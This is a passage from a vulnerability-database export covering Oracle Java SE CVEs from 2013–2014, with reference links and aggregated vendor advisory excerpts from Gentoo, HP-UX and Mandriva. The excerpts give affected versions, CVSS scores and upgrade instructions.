"https://www.redhat.com/security/data/cve/cve-2013-5889.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0415.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2403.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0375.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5831.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0423.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5878.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5776.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0376.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5848.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0410.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5852.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5840.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2427.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-3829.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5907.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5772.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0373.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0458.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0411.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0460.html" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5905.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0417.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0424.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5819.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2412.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2398.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5820.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5809.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5898.html" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2421.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5884.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5825.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5774.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0461.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2423.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5830.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2414.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5784.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5887.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-4002.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0418.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5906.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0387.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-1876.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2401.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0456.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5790.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5787.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5804.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5843.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5888.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5814.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0429.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5829.html" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-7/7u25-2.3.10-1ubuntu0.13.04.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-7/7u25-2.3.10-1ubuntu0.12.10.2" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-3744.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2400" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2400.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2462.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2462" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/icedtea-web/1.3.2-1ubuntu0.12.10.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/icedtea-web/1.2.3-0ubuntu0.12.04.3" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/icedtea-web/1.3.2-1ubuntu1.1" }, { "trust": 0.1, "url": "https://launchpad.net/bugs/1201908" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-1907-2" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2013-1014.html" }, { "trust": 0.1, "url": "http://www.hp.com/java" }, { "trust": 0.1, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2433" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-2461" }, { "db": "BID", "id": "60645" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "122085" }, { "db": "PACKETSTORM", "id": "122075" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "122438" }, { "db": "PACKETSTORM", "id": "122109" }, { "db": "PACKETSTORM", "id": "122439" }, { "db": "PACKETSTORM", "id": "122273" }, { "db": "PACKETSTORM", "id": "122653" }, { "db": "NVD", "id": "CVE-2013-2461" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2013-2461" }, { "db": "BID", "id": "60645" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "122085" }, { "db": "PACKETSTORM", "id": "122075" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "122438" }, { "db": "PACKETSTORM", "id": "122109" }, { "db": "PACKETSTORM", "id": "122439" }, { "db": "PACKETSTORM", "id": "122273" }, { "db": "PACKETSTORM", "id": "122653" }, { "db": "NVD", "id": "CVE-2013-2461" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-06-18T00:00:00", "db": "VULMON", "id": "CVE-2013-2461" }, { "date": "2013-06-18T00:00:00", "db": "BID", "id": "60645" }, { "date": "2014-06-30T23:39:28", "db": "PACKETSTORM", "id": "127267" }, { "date": "2013-06-20T00:48:07", "db": "PACKETSTORM", "id": "122085" }, { "date": "2013-06-18T18:33:33", "db": "PACKETSTORM", "id": "122075" }, { "date": "2014-04-17T22:01:36", "db": "PACKETSTORM", "id": "126195" }, { "date": "2013-07-17T00:03:49", "db": "PACKETSTORM", "id": "122438" }, { "date": "2013-06-21T01:38:12", "db": "PACKETSTORM", "id": "122109" }, { "date": "2013-07-17T00:04:34", "db": "PACKETSTORM", "id": "122439" }, { "date": "2013-07-03T19:05:30", "db": "PACKETSTORM", "id": "122273" }, { "date": "2013-08-02T15:12:49", "db": "PACKETSTORM", "id": "122653" }, { "date": "2013-06-18T22:55:02.727000", "db": "NVD", "id": "CVE-2013-2461" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-07-18T00:00:00", "db": "VULMON", "id": "CVE-2013-2461" }, { "date": "2017-08-22T14:11:00", "db": "BID", "id": "60645" }, { "date": "2022-05-13T14:35:27.090000", "db": "NVD", "id": "CVE-2013-2461" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "60645" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Oracle Java SE CVE-2013-2461 Remote Security Vulnerability", "sources": [ { "db": "BID", "id": "60645" } ], "trust": 0.3 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unknown", "sources": [ { "db": "BID", "id": "60645" } ], "trust": 0.3 } }
var-201404-0381
Vulnerability from variot
Unspecified vulnerability in Oracle Java SE 5.0u61, 6u71, 7u51, and 8; JRockit R27.8.1 and R28.3.1; and Java SE Embedded 7u51 allows remote attackers to affect confidentiality and integrity via vectors related to JNDI. The vulnerability can be exploited over multiple protocols. This issue affects the 'JNDI' sub-component. Java SE (Java Platform Standard Edition) is used to develop and deploy Java applications on desktops, servers, and embedded devices and real-time environments; JRockit is a Java virtual machine built into Oracle Fusion Middleware; Java SE Embedded is a The Java platform for developing powerful, reliable, and portable applications for embedded systems. (CVE-2014-1876)
Note: If the web browser plug-in provided by the icedtea-web package was installed, the issues exposed via Java applets could have been exploited without user interaction if a user visited a malicious website. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201502-12
http://security.gentoo.org/
Severity: Normal Title: Oracle JRE/JDK: Multiple vulnerabilities Date: February 15, 2015 Bugs: #507798, #508716, #517220, #525464 ID: 201502-12
Synopsis
Multiple vulnerabilities have been found in Oracle's Java SE Development Kit and Runtime Environment, the worst of which could lead to execution of arbitrary code. Please review the CVE identifiers referenced below for details.
Impact
A context-dependent attacker may be able to execute arbitrary code, disclose, update, insert, or delete certain data.
Workaround
There is no known workaround at this time.
Resolution
All Oracle JRE 1.7 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.7.0.71"
All Oracle JDK 1.7 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.7.0.71"
All users of the precompiled 32-bit Oracle JRE should upgrade to the latest version:
# emerge --sync # emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.7.0.71"
References
[ 1 ] CVE-2014-0429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429 [ 2 ] CVE-2014-0432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0432 [ 3 ] CVE-2014-0446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446 [ 4 ] CVE-2014-0448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0448 [ 5 ] CVE-2014-0449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0449 [ 6 ] CVE-2014-0451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451 [ 7 ] CVE-2014-0452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452 [ 8 ] CVE-2014-0453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453 [ 9 ] CVE-2014-0454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0454 [ 10 ] CVE-2014-0455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0455 [ 11 ] CVE-2014-0456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456 [ 12 ] CVE-2014-0457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457 [ 13 ] CVE-2014-0458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458 [ 14 ] CVE-2014-0459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459 [ 15 ] CVE-2014-0460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460 [ 16 ] CVE-2014-0461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461 [ 17 ] CVE-2014-0463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0463 [ 18 ] CVE-2014-0464 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0464 [ 19 ] CVE-2014-2397 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397 [ 20 ] CVE-2014-2398 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398 [ 21 ] CVE-2014-2401 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2401 [ 22 ] CVE-2014-2402 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2402 [ 23 ] CVE-2014-2403 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403 [ 24 ] CVE-2014-2409 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2409 [ 25 ] CVE-2014-2410 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2410 [ 26 ] CVE-2014-2412 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412 [ 27 ] CVE-2014-2413 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2413 [ 28 ] CVE-2014-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414 [ 29 ] CVE-2014-2420 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2420 [ 30 ] CVE-2014-2421 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421 [ 31 ] CVE-2014-2422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2422 [ 32 ] CVE-2014-2423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423 [ 33 ] CVE-2014-2427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427 [ 34 ] CVE-2014-2428 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2428 [ 35 ] CVE-2014-2483 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2483 [ 36 ] CVE-2014-2490 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2490 [ 37 ] CVE-2014-4208 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4208 [ 38 ] CVE-2014-4209 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4209 [ 39 ] CVE-2014-4216 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4216 [ 40 ] CVE-2014-4218 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4218 [ 41 ] CVE-2014-4219 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4219 [ 42 ] CVE-2014-4220 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4220 [ 43 ] CVE-2014-4221 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4221 [ 44 ] CVE-2014-4223 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4223 [ 45 ] CVE-2014-4227 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4227 [ 46 ] CVE-2014-4244 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4244 [ 47 ] CVE-2014-4247 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4247 [ 48 ] CVE-2014-4252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4252 [ 49 ] CVE-2014-4262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4262 [ 50 ] CVE-2014-4263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4263 [ 51 ] CVE-2014-4264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4264 [ 52 ] CVE-2014-4265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4265 [ 53 ] CVE-2014-4266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4266 [ 54 ] CVE-2014-4268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4268 [ 55 ] CVE-2014-4288 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4288 [ 56 ] CVE-2014-6456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6456 [ 57 ] CVE-2014-6457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6457 [ 58 ] CVE-2014-6458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6458 [ 59 ] CVE-2014-6466 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6466 [ 60 ] CVE-2014-6468 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6468 [ 61 ] CVE-2014-6476 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6476 [ 62 ] CVE-2014-6485 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6485 [ 63 ] CVE-2014-6492 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6492 [ 64 ] CVE-2014-6493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6493 [ 65 ] CVE-2014-6502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6502 [ 66 ] CVE-2014-6503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6503 [ 67 ] CVE-2014-6504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6504 [ 68 ] CVE-2014-6506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6506 [ 69 ] CVE-2014-6511 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6511 [ 70 ] CVE-2014-6512 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6512 [ 71 ] CVE-2014-6513 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6513 [ 72 ] CVE-2014-6515 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6515 [ 73 ] CVE-2014-6517 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6517 [ 74 ] CVE-2014-6519 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6519 [ 75 ] CVE-2014-6527 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6527 [ 76 ] CVE-2014-6531 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6531 [ 77 ] CVE-2014-6532 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6532 [ 78 ] CVE-2014-6558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6558 [ 79 ] CVE-2014-6562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6562
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201502-12.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2015 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . In a typical operating environment, these are of low security risk as the runtime is not used on untrusted applets.
Release Date: 2014-08-19 Last Updated: 2014-08-19
Potential Security Impact: Remote unauthorized access, disclosure of information, and other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in Java Runtime Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These vulnerabilities could allow remote unauthorized access, disclosure of information, and other vulnerabilities.
References:
CVE-2013-6629
CVE-2013-6954
CVE-2014-0432
CVE-2014-0446
CVE-2014-0448
CVE-2014-0449
CVE-2014-0451
CVE-2014-0452
CVE-2014-0453
CVE-2014-0454
CVE-2014-0455
CVE-2014-0456
CVE-2014-0458
CVE-2014-0459
CVE-2014-0460
CVE-2014-0461
CVE-2014-1876
CVE-2014-2397
CVE-2014-2398
CVE-2014-2401
CVE-2014-2402
CVE-2014-2403
CVE-2014-2409
CVE-2014-2412
CVE-2014-2413
CVE-2014-2414
CVE-2014-2420
CVE-2014-2421
CVE-2014-2422
CVE-2014-2423
CVE-2014-2427
CVE-2014-2428
CVE-2014-2483
CVE-2014-2490
CVE-2014-4208
CVE-2014-4209
CVE-2014-4216
CVE-2014-4218
CVE-2014-4220
CVE-2014-4221
CVE-2014-4223
CVE-2014-4244
CVE-2014-4252
CVE-2014-4262
CVE-2014-4263
CVE-2014-4264
CVE-2014-4265
CVE-2014-4266
CVE-2014-4268
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.23, and B.11.31 running HP JDK and JRE v7.0.09 and earlier.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2013-6629 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-6954 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-0432 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-0446 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0448 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2014-0449 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-0451 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0452 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0453 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0 CVE-2014-0454 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0455 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-0456 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-0458 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0459 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0460 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8 CVE-2014-0461 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-1876 (AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4 CVE-2014-2397 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-2398 (AV:N/AC:M/Au:S/C:N/I:P/A:N) 3.5 CVE-2014-2401 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-2402 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2403 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-2409 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2014-2412 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2413 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2014-2414 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2420 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6 CVE-2014-2421 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-2422 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-2423 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2428 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2014-2483 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-2490 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4208 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6 CVE-2014-4209 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2014-4216 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4218 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4220 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4221 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-4223 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4244 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0 CVE-2014-4252 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-4262 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4263 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0 CVE-2014-4264 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-4265 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4266 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4268 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrade to resolve these vulnerabilities.
The upgrade is available from the following location: http://www.hp.com/java
OS Version Release Version Depot Name
HP-UX B.11.23, B.11.31 JDK and JRE v7.0.10 or subsequent Itanium_JDK_JRE_7.0.10_Aug_2014_Java70_1.7.0.10.00_HP-UX_B.11.31_IA.depot
MANUAL ACTIONS: Yes - Update For Java v7.0 update to Java v7.0.10 or subsequent
PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.23 HP-UX B.11.31 =========== Jdk70.JDK70-COM Jdk70.JDK70-DEMO Jdk70.JDK70-IPF32 Jdk70.JDK70-IPF64 Jre70.JRE70-COM Jre70.JRE70-IPF32 Jre70.JRE70-IPF32-HS Jre70.JRE70-IPF64 Jre70.JRE70-IPF64-HS action: install revision 1.7.0.10.00 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 19 August 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
Note that the CVE-2014-0459 issue is in the lcms2 library, which has been patched to correct this flaw. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
